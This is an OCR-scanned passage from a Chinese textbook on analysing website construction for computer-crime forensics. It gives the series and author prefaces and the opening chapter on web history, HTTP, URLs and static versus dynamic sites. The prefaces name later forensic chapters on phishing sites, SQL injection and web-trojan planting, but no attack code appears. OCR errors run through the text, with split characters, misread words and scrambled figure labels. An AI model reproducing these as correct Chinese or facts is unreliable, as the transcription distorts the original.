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与 分 析 过 程 .在 ASP 网 站 平台 模拟 发 布 敏感 信息 事件 .在 PHP 网 站 模拟 挂 马 攻击 实例 等 ,并 对 每 类 案 
件 发 生 后 如 何在 网 站 平台 下 找到 相关 线索 进行 了 详细 剖析 。 
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年 版 说明 一 


21 世纪 是 信息 时 代 , 信 息 已 成 为 社会 发 展 的 重要 战略 资源 ,社会 的 信息 
化 已 成 为 当今 世界 发 展 的 潮流 和 核心 ,而 信息 安全 在 信息 社会 中 将 扮演 极为 
重要 的 角色 , 它 会 直接 关系 到 国家 安全 企业 经 营 和 人 们 的 日 常生 活 。 随 着 
信息 安全 产业 的 快速 发 展 ,全 球 对 信息 安全 人 才 的 需求 量 不 断 增 加 ,但 我 国 
目前 信息 安全 人 才 极 度 匮乏 , 远 远 不 能 满足 金融 、 商 业 、 公 安 、 军 事 和 政府 等 
部 门 的 需求 。 要 解决 供需 矛盾 ,必须 加 快 信息 安全 人 才 的 培养 ,以 满足 社会 
对 信息 安全 人 才 的 需求 。 为 此 ,教育 部 继 2001 年 批准 在 武汉 大 学 开设 信息 
安全 本 科 专 业 之 后 ,又 批准 了 多 所 高 等 院 校 设立 信息 安全 本 科 专 业 , 而 且 许 
多 高 校 和 科研 院 所 已 设立 了 信息 安全 方向 的 具有 硕士 和 博士 学 位 授予 权 的 
学 科 点 。 

信息 安全 是 计算 机 、 通 信 、 物 理 、 数 学 等 领域 的 交叉 学 科 , 对 于 这 一 新 兴 
学 科 的 培养 模式 和 课程 设置 ,各 高 校 普遍 缺乏 经 验 ,因此 中 国 计 算 机 学 会 
育 专业 委员 会 和 清华 大 学 出 版 社 联合 主办 了 “信息 安全 专业 教育 教学 研讨 
会 ”等 一 系列 研讨 活动 ,并 成 立 了 “高 等 院 校 信息 安全 专业 系列 教材 "编审 委员 
会 ,由 我 国信 息 安全 领域 著名 专家 肖 国 镇 教授 担任 编 委 会 主任 ,共同 指导 “高 等 
院 校 信息 安全 专业 系列 教材 ”的 编写 工作 。 编 委 会 本 着 研究 先行 的 指导 原则 ， 
认真 研讨 国内 外 高 等 院 校 信息 安全 专业 的 教学 体系 和 课程 设置 ,进行 了 大 量 前 
脆性 的 研究 工作 ,而 且 这 种 研究 工作 将 随 着 我 国信 息 安全 专业 的 发 展 不 断 深 
入 。 经 过 编 委 会 全 体委 员 及 相关 专家 的 推荐 和 审定 ,确定 了 本 丛书 首 批 教材 的 
作者 ,这 些 作 者 绝 大 多 数 都 是 既 在 本 专业 领域 有 深厚 的 学 术 造 话 、 又 在 教学 第 
一 线 有 丰富 的 教学 经 验 的 学 者 、 专 家 。 

本 系列 教材 是 我 国 第 一 套 专 门 针 对 信息 安全 专业 的 教材 ,其 特点 是 : 

体系 完整 .结构 合理 内容 先进 。 

@ 适应 面 广 :能 够 满足 信息 安全 ,计算 机 、 通 信 工 程 等 相关 专业 对 信息 
安全 领域 课程 的 教材 要 求 。 

@ 立体 配套 : 除 主 教材 外 ,还 配 有 多 媒体 电子 教案 .习题 与 实验 指导 等 。 

@ 版 本 更 新 及 时 , 紧 跟 科学 技术 的 新 发 展 。 

为 了 保证 出 版 质量 ,我们 坚持 宁 缺 姓 滥 的 原则 ,成 熟 一 本 ,出 版 一 本 ,并 
保持 不 断 更 新 ,力求 将 我 国信 息 安全 领域 教育 ,科研 的 最 新 成 果 和 成 熟 经 验 
反映 到 教材 中 来 。 在 全 力 做 好 本 版 教材 ,满足 学 生 用 书 的 基础 上 ,还 经 由 专 
家 的 推荐 和 审定 , 送 选 了 一 批 国外 信息 安全 领域 优秀 的 教材 加 入 到 本 系列 教 
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材 中 ,以 进一步 满足 大 家 对 外 版 书 的 需求 。 热 切 期 望 广大 教师 和 科研 工作 者 加 入 我 们 的 
队伍 ,同时 也 欢迎 广大 读者 对 本 系列 教材 提出 宝贵 意见 ,以 便 我 们 对 本 系列 教材 的 组 织 、 
编写 与 出 版 工作 不 断 改进 ,为 我 国信 息 安 全 专业 的 教材 建设 与 人 才 培 养 做 出 更 大 的 贡献 。 

“高 等 院 校 信息 安全 专业 系列 教材 "已 于 2006 年 年 初 正式 列 人 普通 高 等 教育 “十 一 
五 ”国家 级 教材 规划 ( 见 教 高 [200619 号 文件 (教育 部 关于 印发 普通 高 等 教育 “十 一 五 ” 国 
家 级 教材 规划 选 题 的 通知 》) 。 我 们 会 严 把 出 版 环节 .保证 规划 教材 的 编校 和 印刷 质量 , 按 
时 完成 出 版 任务 。 

2007 年 6 月 ,教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 成 立 大 会 既 第 一 次 会 
议 在 北京 胜利 召开 。 本 次 会 议 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 主任 单 
位 北京 工业 大 学 和 北京 电子 科技 学 院 主办 ,清华 大 学 出 版 社 协办 。 教 育 部 高 等 学 校 信 息 
安全 类 专业 教学 指导 委员 会 的 成 立 对 我 国信 息 安 全 专业 的 发 展 将 起 到 重要 的 指导 和 推动 
作用 。“ 高 等 院 校 信息 安全 专业 系列 教材 ”将 在 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 
委员 会 的 组 织 和 指导 下 ,进一步 体现 科学 性 、 系 统 性 和 新 颖 性 ,及 时 反映 教学 改革 和 课程 
建设 的 新 成 果 , 并 随 着 我 国信 息 安 全 学 科 的 发 展 不 断 修订 和 完善 。 

我 们 的 E-mail 地 址 : zhangm@tup. tsinghua. edu. cn; 联 系 人 : 张 民 。 
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随 着 计算 机 应 用 的 不 断 普 及 ,有 关 计算 机 犯罪 的 案例 也 在 不 断 增多 , 特 
别 是 通过 各 类 网 站 进行 非法 活动 ,如 黄色 网 站 、 赌 博 网 站 .钓鱼 网 站 、 在 网 站 
上 发 布 虚 假 敏 感 信息 以 及 针对 网 站 漏洞 进行 攻击 的 案例 屡见不鲜 。 如 何 能 
使 这 类 计算 机 犯罪 受到 有 效 的 惩治 ,对 计算 机 犯罪 侦查 和 取证 人 员 提 出 了 更 
高 的 要 求 , 其 中 网 站 构建 基本 理论 及 常见 的 网 站 构建 技术 是 必须 掌握 的 内 
容 , 只 有 在 熟悉 常用 的 网 站 构建 方法 、 后 台 架 构 、 各 类 网 站 平台 特征 .关键 的 
数据 库 连接 文件 存放 位 置 、 网 站 数据 访问 痕迹 等 问题 的 基础 上 才能 获得 有 效 
的 电子 证 据 和 案件 线索 ,为 打击 犯罪 提供 有 利 的 保障 。 

本 书 从 计算 机 犯罪 侦查 和 取证 的 角度 出 发 ,介绍 了 目前 主流 的 ASP、 
PHP 及 JSP 三 大 网 站 平台 的 构建 方法 ,分析 了 相应 特征 ,并 以 实例 方式 介绍 
了 如 何 追 踪 保 存在 网 站 后 台 服 务 器 中 的 数据 访问 痕迹 。 

全 书 共 分 6 章 。 第 1 章 是 网 站 构建 分 析 概 述 ,包括 网 站 发 展 史 、 工 作 原 
理 、 组 成 结构 .后 台 架 构 及 实验 所 用 虚拟 机 软件 介绍 等 。 第 2 章 是 ASP 网 站 
构建 分 析 , 包 括 典 型 ASP 网 站 构建 方法 .IDC 网 站 系统 构建 及 ASP 网 站 平 
台 分 析 。 第 3 章 是 钓鱼 网 站 构建 分 析 , 包 括 网 页 文件 概述 、 钓 鱼网 站 概述 、 工 
作 流 程 组 成 结构 .构建 实例 .实例 分 析 等 。 第 4 章 SQL 注入 攻击 痕迹 分 析 ， 
包括 SQL 注入 成 因 分 析 .手工 注入 实例 . 读 取 网 站 主 目录 位 置 \. 利 用 差异 备 
份 上 传 网 页 木马 及 通过 ASP 注入 防火 墙 来 防御 SQL 注入 等 。 第 5 章 是 
LAMP 平 台 下 PHP 网 站 构建 分 析 , 主要 包括 LAMP 平台 简介 .PHP 概述 、 
LAMP 平台 搭建 .LAMP 平台 下 发 布 PHP 网 站 .LAMP 平台 中 PHP 网 站 
分 析 及 PHP 网 站 挂 马 攻 击 痕迹 分 析 等 。 第 6 章 是 JSP 网 站 构建 分 析 , 包 括 
JSP 概述 .构建 JSP 网 站 运行 平台 .发布 JSP 网 站 及 网 站 分 析 。 

本 教材 由 肖 萍 负责 整体 结构 设计 并 编写 第 1 一 第 3 第 5 和 第 6 章 , 徐 国 
天 编写 了 第 4 章 , 刘 奇 志 编写 了 第 1. 1 节 , 段 严 兵 编写 了 第 5. 1 节 , 武 晓 飞 编 
写 了 第 3. 2 节 。 本 教材 的 突出 特点 是 实用 性 强 , 内 容 全 面 , 基 本 涵盖 了 目前 
主流 的 网 站 开发 平台 类 型 。 注 重 理论 与 实践 结合 ,突出 专业 特点 。 

尽管 在 编写 过 程 中 作者 做 了 很 多 努力 ,但 由 于 水 平 有 限 ,教材 中 不 妥 之 
处 在 所 难免 , 敬 请 读者 批评 指正 。 


编 者 
2013 年 12 月 
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,0 网 站 发 展 史 


WWW(World Wide Web) 是 1989 年 英国 人 TimBerners. Lee 在 欧洲 共同 体 的 一 个 
大 型 科研 机 构 任 职 时 发 明 的 。 通 过 Web, 互 联网 上 的 资源 可 以 在 一 个 网 页 里 比较 直观 地 
表示 出 来 ;而 且 资源 之 间 在 网 页 上 可 以 链 来 链 去 。 在 2003 年 以 前 的 互联 网 Web 应 用 根 
据 其 特点 人 们 通常 将 其 称 为 Web1.0 时 代 ,Web1. 0 是 以 静态 . 单 向 阅读 为 主 ; Web2.0 是 
以 分 享 为 特征 的 实时 网 络 ; Web3. 0 是 以 网 络 化 和 个 性 化 为 特征 ,提供 更 多 人 工 智 能 服 
务 。 目 前 的 主流 模式 是 Web2. 0。 


1.11 Web1.0 


Webl1.0 时 代 最 明显 特征 就 是 用 户 通 过 浏览 器 获取 信息 ,是 以 网 站 对 用 户 为 主 ,具体 
表现 如 下 : 

(1) Web1.0 基本 采用 的 是 技术 创新 主导 模式 ,信息 技术 的 变革 和 使 用 对 于 网 站 的 新 
生 与 发 展 起 到 了 关键 性 的 作用 。 新 浪 公 司 的 最 初 就 是 以 技术 平台 起 家 ,搜狐 公司 以 搜索 
技术 起 家 ,腾讯 公司 以 即时 通信 技术 起 家 ,盛大 公司 以 网 络 游 戏 起 家 ,在 这 些 网 站 的 创始 
阶段 ,技术 性 的 痕迹 相当 重 。 

(2) Web1.0 的 一 利 都 基于 一 个 共通 点 , 即 巨 大 的 点 击 流量 。 无 论 是 早期 融资 还 是 后 
期 获 利 , 依 托 的 都 是 为 数 众多 的 用 户 和 点 击 率 , 以 点 击 率 为 基础 上 市 或 开展 增值 服务 , 受 
众 的 基础 决定 了 一 利 的 水 平和 速度 ,充分 地 体现 了 互联 网 的 眼球 经 济 色 彩 。 

(3) Web1.0 的 发 展 出 现 了 向 综合 门户 合流 现象 ,早期 的 新 浪 、 搜 狐 、 网 易 等 公司 , 继 
续 坚 持 了 门户 网 站 的 道路 ,而 腾讯 .MSN、Google 等 网 络 “ 新 贵 ”, 都 纷纷 走向 了 门户 网 络 ， 
尤其 是 对 于 新 闻 信 息 ,. 有 着 极 大 的 兴趣 。 这 一 情况 的 出 现 ,使 得 门户 网 站 本 身 的 盈利 空间 
更 加 广阔 ,权利 方式 更 加 多 元 化 ,占据 网 站 平台 ,可 以 更 加 有 效 地 实现 增值 意图 ,并 延伸 由 
主 营业 务 之 外 的 各 类 服务 。 

(4) 在 Webl1.0 时 代 , 并 不 是 以 html 为 主 , 一 些 动态 网 站 已 经 被 广泛 应 用 ,如 动 网 论 
坛 等 。 


112 Web20 


Web2.0 是 相对 Web1. 0 而 言 的 ,和 Webl.0 相同 。 它 不 是 一 种 技术 的 代名词 ,而 是 
一 个 时 代 的 总 称 。 


网 站 构建 分 析 mw 


1. 人 是 灵魂 
在 互联 网 的 新 时 代 , 信 息 是 由 每 个 人 贡献 出 来 的 。 所 有 的 人 共同 组 成 互联 网 信息 源 。 
Web2.0 的 灵魂 是 人 。 


2. 多 人 参与 

Webl.0 里 ,互联 网 内 容 是 由 少数 编辑 人 员 (或 站 长 ) 定 制 的 ,如 搜狐 ;而 在 Web2. 0 
里 ,每 个 人 都 是 内 容 的 供稿 者 。Web2. 0 的 内 容 更 多 元 化 : 标签 tag、 多 媒体 、 在 线 协作 等 。 
在 Web2.0 信息 获取 渠道 里 ,RSS 订阅 扮演 者 一 个 很 重要 的 作用 。 


3. Web20 的 元 素 

Web2.0 包含 了 经 常 使 用 到 的 服务 ,如 博客 播客、 维基 、P2P 下 载 . 社 区 、 分 享 服 
务 等 。 

4. 可 读 可 写 互联 网 

在 Webl.0 里 ,互联 网 是 “阅读 式 互 联网 ”, 而 Web2.0 是 “可 写 可 读 互 联网 ”。 虽 然 每 
个 人 都 参与 信息 供稿 ,但 在 大 范围 里 看 ,贡献 大 部 分 内 容 的 是 小 部 分 的 人 。Web2.0 实际 
上 是 对 Web1.0 的 信息 源 进行 扩展 ,使 其 多 样 化 和 个 性 化 。 博 客 是 Web2. 0 里 十 分 重要 
的 元 素 , 因 为 它 打破 了 门户 网 站 的 信息 垄断 ,未 来 博客 的 地 位 将 更 为 重要 。 


1.13 Web30 


Web3.0 的 最 大 价值 不 是 提供 信息 ,而 是 提供 基于 不 同 需求 的 过 滤器 ,每 一 种 过 滤器 
都 是 基于 一 个 市 场 需求 。 如 果 说 Web2.0 解决 了 个 性 解放 的 问题 ,那么 Web3. 0 就 是 解 
决 信息 社会 机 制 的 问题 ,也 就 是 最 优化 信息 聚会 的 问题 。 

人 们 只 需要 输入 自己 的 需求 ,就 可 以 迅速 得 到 所 需 信 息 , 甚 至 是 一 套 完整 的 解决 方 
案 。 例 如 ,在 计算 机 中 输入 :“ 我 想 带 我 11 岁 的 孩子 去 一 个 温暖 的 地 方 度假 ,我 的 预算 为 
3000 美元 。 ”计算机 能 自动 给 出 一 套 完 整 方案 ,这 一 方案 可 能 包括 度假 路 线 图 .适合 选择 
的 航班 .价格 适宜 的 酒店 等 。 可 以 预见 ,承接 Web2.0 的 以 人 为 本 理念 ,Web3.0 模式 中 
将 会 出 现 各 种 高 度 细 分 领域 的 平民 专家 。 

真正 的 Web3. 0 不 仅 止 于 根据 用 户 需求 提供 综合 化 服务 ,创建 综合 化 服务 平台 ,关键 
在 于 提供 基于 用 户 偏好 的 个 性 化 聚合 服务 。 在 Web3. 0 时 代 , 同 一 模式 化 的 综合 服务 门 
户 将 不 复 存 在 ,如 人 们 看 到 的 新 浪 首页 将 是 个 人 感 兴趣 的 新 闻 ,而 那些 他 不 感 兴趣 的 新 闻 
将 不 会 显示 。 当 然 ,这 种 个 性 化 的 聚合 必须 依赖 强大 的 智能 化 识别 系统 ,以 及 长 期 对 于 一 
个 用 户 互联 网 行为 规律 的 分 析 和 锁定 , 它 将 颠覆 传统 的 综合 门户 ,使 得 Web3.0 时 代 的 互 
联网 评价 标准 不 再 是 浏览 的 点 击 率 , 而 是 到 达 率 和 用 户 价值 。 

因此 ,在 Web3.0 时 代 能 够 赢得 用 户 青睐 的 网 站 ,一定 是 基于 用 户 行 为 .习惯 和 信息 
的 聚合 而 构建 的 ,人 性 化 、 友 好 界面 简单 易 用 一 定 是 其 核心 元 素 ,基于 用 户 需 求 的 信息 聚 
合 才 是 互联 网 的 未 来 发 展 趋势 。 
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加 | 2 网 站 工作 原理 


在 进行 网 站 构建 分 析 之 前 ,需要 了 解 网 站 的 工作 模式 及 访问 网 站 所 使 用 的 协议 及 工 
作 原 理 。 


121 网 站 工作 模式 


目前 ,大 多 数 网 站 的 工作 模式 是 浏览 器 和 服务 器 (Browser/Server,B/S) 模 式 。 它 是 
对 C/S 结构 的 一 种 变化 或 改进 的 结构 。 所 谓 C/S(Client/Server) 模 式 , 是 传统 的 网 络 应 
用 程序 通常 采用 的 工作 模式 。 这 种 模式 下 ,客户 端 机 器 必须 安装 特定 的 客户 端 应 用 程序 ， 
并 做 大 量 的 配置 工作 ,才能 与 指定 的 服务 器 进行 通信 。 在 C/S 模式 下 ,系统 维护 繁琐 , 维 
护 费用 高 ,而且 不 易 扩展 。 

在 B/S 模式 下 ,用 户 工作 界面 通过 浏览 器 来 实现 ,用 户 访问 网 站 只 需 打 开 Web 浏览 
器 即 可 ,浏览 器 类 型 没有 限制 ,360、TT IE Firefox 均 可 。 由 于 客户 端 采用 的 是 简单 易 用 
的 Web 浏览 器 软件 ,不 但 可 以 为 所 有 用 户 提供 统一 的 交互 界面 ,而 且 也 无 须 像 C/S 模式 
那样 在 客户 机 上 安装 庞大 的 客户 端 应 用 程序 。 如 图 1-1 所 示 ,B/S 模式 通常 由 Web 浏览 
器 `Web 服务 器 和 数据 库 服 务 器 三 大 部 分 组 成 。 其 中 ,客户 端 由 Web 浏览 器 来 实现 , 它 
将 用 户 在 页 面 上 提交 的 请 求 发 送 给 Web 应 用 服务 器 ,并 将 Web 服务 器 返回 的 结果 显示 
给 用 户 。Web 服务 器 负责 接受 客户 端 发 过 来 的 页 面 请 求 , 并 将 处 理 结果 送 回 浏览 器 。 数 
据 库 服 务 器 的 主要 任务 是 根据 Web 服务 器 发 送 的 请 求 进行 数据 库 操 作 ( 查 询 、 添 加、 删除 
与 更 新 等 ) ,并 将 操作 的 结果 传送 给 Web 服务 器 。 


加 
Web 浏 览 器 Web 服 务 器 数据 库 服务 器 
图 1-1 网 站 工作 模式 
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1. HTIP 协 议 

HTTP 是 Hypertext Transfer Protocol 的 缩写 形式 , 称 为 超 文本 传输 协议 ,是 目前 互 
联网 上 应 用 最 为 广泛 的 一 种 网 络 协议 。 浏 览 器 请 求 网 页 大 多 数 使 用 HTTP 协议 ,浏览 器 
通过 HTTP 协议 将 网 页 文件 从 网 站 服务 器 处 提取 出 来 的 ,并 翻译 成 精美 漂亮 的 页 面 进行 
显示 处 理 , 所 有 的 网 页 文件 都 必须 遵守 这 个 标准 。 设 计 HTTP 协议 的 最 初 目的 就 是 为 了 
提供 一 种 发 布 和 接收 HTML 页 面 的 方法 。 该 协议 具有 以 下 特点 : 

1) 支持 请 求 /响应 模式 

首先 客户 端 发 送 一 个 请 求 (request) 给 服务 器 ,服务 器 在 接收 到 这 个 请 求 后 将 生成 一 
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个 响应 (response) 返 回 给 客户 端 。 这 里 客户 端 指 终端 用 户 , 如 Web 浏览 器 、 网 络 息 虫 或 
者 其 他 的 工具 。 服 务 器 端 是 网 站 ,存储 着 一 些 资源 ,如 HTML 文件 和 图 像 。 客 户 端 与 服 
务 器 端 之 间 的 一 次 信息 交换 的 完整 过 程 为 ,首先 ,客户 端 与 服务 器 端 建立 TCP 连接 ; 然 
后 ,客户 端 发 出 HTTP 请 求 ,服务 器 端 发 出 相应 的 HTTP 响应 ;最 后 ,客户 端 与 服务 器 端 
之 间 的 TCP 连接 关闭 。 

例如 ,客户 想 浏览 www. ccpc. edu. cn 网 站 , 则 首先 浏览 器 要 与 网 络 上 域名 为 www. 
ccpc. edu. cn 的 Web 服务 器 建立 TCP 连接 。 浏 览 器 发 出 要 求 访问 java/book. htm 的 
HTTP 的 请 求 。Web 服务 器 在 接收 到 HTTP 请 求 后 ,解析 HTTP 请 求 , 然 后 发 回 包含 
book. htm 文件 数据 的 HTTP 响应 。 浏 览 器 在 接收 到 HTTP 响应 后 ,解析 HTTP 响应 ， 
并 在 窗口 中 展示 book. htm 文件 。 最 后 ,浏览 器 与 Web 服务 器 之 间 的 TCP 连接 关闭 。 

HTTP 服务 器 与 HTTP 客户 程序 分 别 由 不 同 的 软件 开发 商 提供 ,HTTP 客户 程序 
包括 IE、Netscape 等 浏览 器 ;最 常用 的 HTTP 服务 器 包括 IIS、Apache 等 。HTTP 服务 
器 与 HTTP 客户 程序 分 别 由 不 同 的 语言 编写 ,并 且 运 行 在 不 同 的 平台 上 ,双方 要 看 得 懂 
对 方 发 送 的 数据 要 归功 于 HTTP 协议 。HTTP 协议 规定 了 HTTP 请 求 和 HTTP 响应 
的 数据 格式 ,HTTP 服务 器 与 客户 程序 间 交 换 数据 都 必须 遵守 HTTP 协议 。 

2) 简单 快速 

客户 向 服务 器 请 求 服务 时 ,只 需 传送 请 求 方 法 和 路 径 。 请 求 方 法 常用 的 有 GET、 
HEAD、POST。 每 种 方法 规定 了 客户 与 服务 器 联系 的 不 同类 型 。 由 于 HTTP 协议 简单 ， 
使 得 HTTP 服务 器 的 程序 规模 小 ,因而 通信 速度 很 快 。 

3) 灵活 

HTTP 允许 传输 任意 类 型 的 数据 对 象 。 正 在 传输 的 类 型 由 Content-Type 加 以 
标记 。 

4) 无 连接 

无 连接 的 含义 是 限制 每 次 连接 只 处 理 一 个 请 求 。 服 务 器 处 理 完 客户 的 请 求 , 并 收 到 
客户 的 应 答 后 , 即 断 开 连 接 。 采 用 这 种 方式 可 以 提高 传输 效率 ,在 没有 请 求 提出 时 ,服务 
器 就 不 会 在 那里 空闲 等 待 。 

5) 无 状态 

其 优点 是 由 于 无 须 记 忆 状 态 使 得 HTTP 累 赣 少 , 系 统 运行 效率 高 ,服务 器 应 答 快 。 

其 缺点 是 由 于 没有 状态 ,协议 对 事务 处 理 没 有 记忆 能 力 , 若 后 续 事 务 处 理 需要 有 关 前 
面 处 理 的 信息 ,那么 这 些 信息 必须 在 协议 外 面 保存 ,导致 每 次 连接 需要 传送 较 多 的 信息 。 


2. 统一 资源 定位 符 (Uniform Resource Locator, URL) 

在 HTTP 协议 请 求 数据 包 中 ,一 个 很 重要 的 信息 就 是 URL ,用 来 指明 请 求 信息 的 路 
径 ,URL 的 使 用 形式 如 “http://www. ccpc. edu. cn/content. jsp? newsid 一 9221”, 通 常 
一 个 完整 的 URL 包括 以 下 5 部 分 : 

1) 协议 

表示 客户 端 与 服务 端 通信 采用 的 协议 ,通常 是 HTTP 协议 ,但 是 在 一 些 电 子 商务 网 
站 的 关键 信息 输入 网 页 采用 的 是 HTTPS 协议 , 即 采 用 安全 技术 的 HTTP 协议 。 例 如 ， 
4 


me 第 1 章 网 站 构建 概述 mm 


浏览 器 访问 淘宝 登录 页 面 , 采 用 的 就 是 HTTPS 协议 。 

2) 主机 

所 访问 网 站 的 域名 或 IP 地 址 ,如 果 为 域名 ,在 真正 访问 网 站 服务 器 前 ,必须 将 该 域名 
解析 为 对 应 的 IP 地 址 ,域名 便于 人 们 记忆 ,但 最 终 用 来 寻 址 定位 网 站 的 是 IP 地 址 。 

3) 端口 

如 果 为 Web 默认 端口 80, 则 可 以 在 URL 里 面 省 略 ,如 果 网 站 使 用 的 是 非 默 认 端 口 ， 
则 必须 在 URL 里 指明 ,如 http://210. 47. 128. 134:8080/index. jsp。 

4) 文件 

客户 端 要 访问 的 具体 网 页 名 称 , 通 常 带 有 路 径 信 息 , 如 果 该 部 分 省 略 , 表 示 访 问 的 为 
默认 文档 ,默认 文档 通常 为 index. htm、index. asp、index. jsp、index. php 等 ,具体 见 Web 
服务 器 设置 。 

5) 附加 资源 

URL 字符 串 中 “?” 后 面 的 字符 串 为 附加 资源 ,“&.” 可 连接 多 个 附加 资源 。 动 态 网 页 
在 设计 实现 时 可 以 通过 附加 资源 的 方式 向 网 页 动态 传递 参数 .根据 不 同 参数 值 , 在 浏览 器 
显示 不 同 内 容 的 网 页 。 例 如 ,通过 “http://www. ccpc. edu. cn/content. jsp? newsid 一 
9221”URL 地 址 可 能 看 到 一 篇 新 闻 报 道 , 而 更 改 newsid= 王 9222 ,看 到 的 可 能 就 是 另外 一 
篇 内 容 完全 不 同 的 新 闻 报 道 。 另 外 ,通过 “&.” 可 以 连接 多 个 附加 资源 ,如 “http://www. 
ccpc. edu. cn/content. jsp? wbtreeid 王 1089&.wbnewsid 王 9221newsid 一 9221”。 


123 网 站 工作 原理 概述 


1. 服务 器 端 与 客户 端 

通常 来 说 ,提供 服务 的 一 方 被 称 为 服务 器 端 ,而 接受 服务 的 一 方 则 被 称 为 客户 端 。 例 
如 , 当 浏 览 者 在 浏览 中 国 刑警 学 院 网 站 主页 时 ,中 国 刑警 学 院 网 站 主页 所 在 的 服务 器 就 称 
为 服务 器 端 ,而 浏览 者 的 计算 机 就 被 称 为 客户 端 。 

服务 器 端 和 客户 端 并 不 是 一 成 不 变 的 ,如 果 原 来 提供 服务 的 服务 器 端 用 来 接受 其 他 
服务 器 端的 服务 ,此 时 该 服务 器 将 转化 为 客户 端 。 如 果 计算 机 上 已 安装 了 WWW 服务 器 
软件 ,此 时 就 可 以 把 此 计算 机 作为 服务 器 , 称 为 服务 器 端 ,浏览 者 可 以 通过 网 络 访问 到 该 
计算 机 。 在 后 面 实现 操作 过 程 中 ,通常 通过 虚拟 机 模拟 WWW 服务 器 端 ,本 机 作为 客户 
端 ,当然 也 可 以 把 本 机 即 当 作 服 务 器 ,又 当 作 客户 端 。 


2 静态 网 站 工作 原理 
所 谓 静态 网 站 ,是 指 在 服务 器 端 发 布 的 是 静态 网 页 , 即 在 网 页 文件 里 不 存在 程序 代 
码 , 只 有 HTML 标记 ,其 文件 后 级 名 为 htm 或 html。 静 态 网 页 创建 成 功 后 ,其 中 的 内 容 
不 会 再 发 生变 化 ,无 论 何 时 何人 访问 ,显示 的 内 容 都 是 一 样 的 ,如 果 要 对 其 中 的 内 容 进行 
修改 、 添 加 、 删 除 等 操作 ,就 必须 到 程序 的 源 代码 中 进行 相关 操作 ,再 重新 上 传 到 服务 
器 上 。 
当 用 户 在 浏览 器 上 输入 URL 网 址 ,并 按 Enter 键 后 ,表明 向 服务 器 发 出 了 一 个 浏览 
网 页 的 请 求 ,其实 静态 网 站 的 工作 原理 很 简单 ,就 是 一 个 请 求 和 响应 的 模式 ,客户 端 请 求 
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服务 器 端 ,服务 器 把 请 求 的 数据 相应 返回 给 客户 要 
端 。 当 服务 器 收 到 请 求 后 ,就 在 其 管理 的 主 目录 一 | 接受 请 求 找到 
下 查找 用 户 所 要 浏览 的 网 页 ,找到 后 将 其 原封 不 网 由 江汉 加 网 册 


返回 网 页 


动 的 再 发 送 给 客户 端 ， 过 浏览 行 
动 的 再 发 送 给 客户 端 。 由 客户 端 浏览 器 解释 执行 闻 12 兹 态 网 站 工作 原 间 


静态 网 页 ,为 用 户 显示 精美 的 网 页 。 其 原理 如 
图 1-2 所 示 。 


3. 动态 网 站 工作 原理 

动态 网 站 是 指 在 服务 器 端 发 布 的 是 动态 网 页 ,在 动态 网 页 中 不 仅 包 含 HTML 标记 ， 
同时 还 包含 实现 相关 功能 的 程序 代码 ,该 网 页 的 后 缀 通常 根据 程序 语言 的 不 同 而 不 同 。 
例如 ,ASP 文件 的 后 缀 为 asp, 而 JSP 文件 的 后 级 则 为 jsp。 动 态 网 页 可 以 根据 不 同 的 时 
间 ,不 同 的 浏览 者 而 显示 不 同 的 信息 。 例 如 ,常见 的 留言 板 ,论坛 博客 等 都 是 应 用 动态 网 
页 实现 的 。 其 工作 原理 如 图 1-3 所 示 。 


http://www.ccpc.edu.cn/index.php lusr/locallwww 
index.html Apach 
© index.jpg 9% 
index.rar 
@ index.php 
HTML 
CSS 
JavaScript 加 PHP 
IE 加 @ 
MySQL 
UNIXLinux Windows 
210.47.128.15 


R www.ccpc.edu.cn 


图 1-3 动态 网 站 工作 原理 


例如 ,用户 请 求 的 是 “http://www. ccpc. edu. cn/index. php”,WWW 服务 器 Apache 
接收 到 该 请 求 后 ,在 其 所 管理 的 主 目录 中 查找 index. php ,找到 后 如 果 仅仅 将 该 文件 原封 
不 动 地 返回 给 客户 端 ,这 时 ,客户 端 会 出 现 弹出 下 载 对 话 框 如 图 1-4 所 示 。 

因为 浏览 器 不 能 解释 执行 PHP 程序 代码 ,而 Apache 本 身 又 完成 不 了 对 PHP 的 解 
释 工作 。 因 此 还 要 在 WWW 服务 上 还 要 装 一 个 应 用 服务 器 专门 解释 后 台 程 序 代码 的 、 并 
且 在 Web 服务 器 里 面 设置 针对 后 缀 名 为 PHP 的 客户 请 求 ,找到 后 不 直接 发 给 浏览 器 ,而 
是 将 PHP 文件 转发 到 PHP 应 用 服务 器 上 去 解析 .如 果 网 页 涉及 数据 存 取 操作 , 则 需要 
在 动态 网 页 文件 中 能 入 SQL(Structure Query Language) 来 实现 ,那么 还 必须 在 WWW 
服务 器 中 安装 数据 库 软 件 ,或 单独 构建 数据 库 服 务 器 。 以 用 户 请 求 “http://www. ccpc. 
edu. cn/index. php” 为 例 , 在 服务 器 端 对 该 动态 网 页 请 求 的 具体 处 理 流程 为 : 
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名 称 : index.php 
和 类 型 ， PHP Script, 19 字 节 
发 送 者 : 192.168.111.128 


sw | mg | [Em 
厅 打开 此 类 文件 之 前 总 是 询问 他 ) 


O 


图 1-4 “文件 下 载 ”窗口 


(1) 用 户 在 浏览 器 输入 “http://www. ccpc. edu. cn/index. php” 并 按 Enter 键 后 ,此 
时 就 说 明 向 服务 器 发 出 了 一 个 浏览 网 页 的 请 求 。 

(2) 当 Apache 服务 器 接收 到 该 动态 网 页 请 求 后 .在 其 所 管理 的 主 目录 中 查找 index. 
php; 发 现 其 后 级 为 . php, 则 将 其 文件 代码 转发 给 PHP 应 用 服务 器 。 

(3) PHP 应 用 服务 器 对 index. php 文件 中 的 PHP 程序 代码 进行 处 理 ,将 其 翻译 成 对 
应 的 HTML ,JavaScript\CSS 代码 ,并 将 其 进行 封装 ,生成 HTTP 响应 数据 包 , 返 回 给 客 
户 端 。 若 发 现 SQL 语句 , 则 连接 指定 的 数据 库 服务 器 ,将 SQL 语句 发 送 到 数据 库 中 , 转 
至 第 步骤 (4) 。 

(4) 若是 动态 查询 请 求 页 面 , 则 根据 从 PHP 应 用 服务 器 接收 到 的 查询 条 件 在 数据 库 
中 通过 SQL 语句 将 数据 取出 ,并 将 取出 的 数据 返回 PHP 应 用 服务 器 ;若是 数据 库存 储 或 
更 新 操作 , 则 将 从 PHP 应 用 服务 器 接收 到 的 数据 整理 好 插入 到 数据 库 中 去 ,或 对 相应 数 
据 进程 更 新 ,并 将 操作 结构 返回 到 PHP 应 用 服务 器 中 。 

